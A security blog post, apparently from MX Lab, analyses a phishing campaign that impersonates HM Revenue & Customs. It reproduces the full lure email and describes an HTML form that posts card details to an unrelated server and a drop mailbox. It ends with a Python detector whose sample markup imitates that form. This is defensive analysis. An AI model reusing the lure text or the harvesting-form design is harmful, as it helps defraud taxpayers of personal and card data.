HM Revenue & Customs phishing emails – continued

MX Lab, http://www.mxlab.eu, is intercepting tax refund phishing emails with the subject “Please Submit Your Payment Refund” and an attached HTML webpage. We reported on this earlier, on January 27th, 2011, and the campaign is still running in a modified version.

The emails are sent from the spoofed email address srvcs@hmrc.gov.uk, and possibly other combinations, and have the following body:

Dear Applicant:

Following an upgrade of our computer systems and review of our records we have investigated your payments and latest tax returns over the last seven years our calculations show that you have made over payments of GBP 178.25

Due to the high volume of refunds due you must complete the online application, the telephone help line is unable to assist with this application. In oder to process your refund you will need to complete the application form attached to this email.Your refund may take up to 6 weeks to process please make sure you complete the form correctly.

NOTE: If you’ve received an Income Tax ‘repayment’ it will either be following a claim you’ve made or because HM Revenue & Customs (HMRC) has received new information about your taxable income or entitlement to allowances. The refund may come through your tax code or as a payment and could relate to the current tax year or earlier years.

An Income Tax repayment is a refund of tax that you’ve overpaid. So, if you’ve paid too much tax for example through your job or pension this year or in previous years HMRC will send you a repayment. You’ll get the repayment by bank transfer directly to your credit or debit card.

————————————————————–

Copyright 2011, HM Revenue Customs UK All rights reserved.

Attached to the email is an HTML page with the name Refund_Form.htm. Once opened, it presents a web form asking you to submit your personal details together with your credit card details.

Looking into the HTML source code, we find that the layout and images are taken directly from the http://www.hmrc.gov.uk/ web site. The form data itself is sent to hxxp://www.hotel-bergara.com/cgi-bin/mailform.cgi. After submitting data you are redirected to the HM Revenue & Customs web site. The form's hidden values show us that the data is sent to govukgov@yahoo.com.
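The traits described above (brand assets loaded from the real site, a form posting to an unrelated host, a hidden field carrying a mailbox) can be checked automatically on HTML attachments at a mail gateway. The following is an added example, not code from MX Lab; the sample markup, its host names, paths and field names are constructed placeholders, and `audit_attachment` is a hypothetical helper.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")

# Constructed sample attachment; hosts, paths and field names are placeholders.
SAMPLE = """<html><body>
<img src="http://www.hmrc.gov.uk/images/logo.gif">
<form method="post" action="http://collector.example/cgi-bin/mailform.cgi">
<input type="hidden" name="recipient" value="dropbox@mail.example">
<input type="hidden" name="redirect" value="http://www.hmrc.gov.uk/">
<input type="text" name="card_number">
</form></body></html>"""

class FormAudit(HTMLParser):
    """Collect form targets, hidden inputs and remote asset hosts."""
    def __init__(self):
        super().__init__()
        self.actions, self.hidden, self.asset_hosts = [], {}, set()

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self.actions.append(a.get("action", ""))
        elif tag == "input" and a.get("type", "").lower() == "hidden":
            self.hidden[a.get("name", "")] = a.get("value", "")
        elif tag in ("img", "link", "script"):
            host = urlparse(a.get("src") or a.get("href") or "").hostname
            if host:
                self.asset_hosts.add(host)

def under(host, domain):
    """True if host is the domain itself or one of its subdomains."""
    return host == domain or host.endswith("." + domain)

def audit_attachment(html, brand_domain):
    """Return (finding, value) tuples for an HTML attachment."""
    p = FormAudit()
    p.feed(html)
    findings = []
    uses_brand = any(under(h, brand_domain) for h in p.asset_hosts)
    for action in p.actions:
        host = urlparse(action).hostname
        if host and not under(host, brand_domain):
            kind = "brand-assets-offsite-post" if uses_brand else "offsite-post"
            findings.append((kind, host))
    for value in p.hidden.values():
        findings.extend(("hidden-email-recipient", m) for m in EMAIL_RE.findall(value))
    return findings
```

A form whose action stays on the brand's own domain and whose hidden fields carry no mailbox produces no findings, so the check can run on every HTML attachment before delivery.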

We also have a second example where the email contains a URL to the phishing web site instead of an attachment embedded in the message.
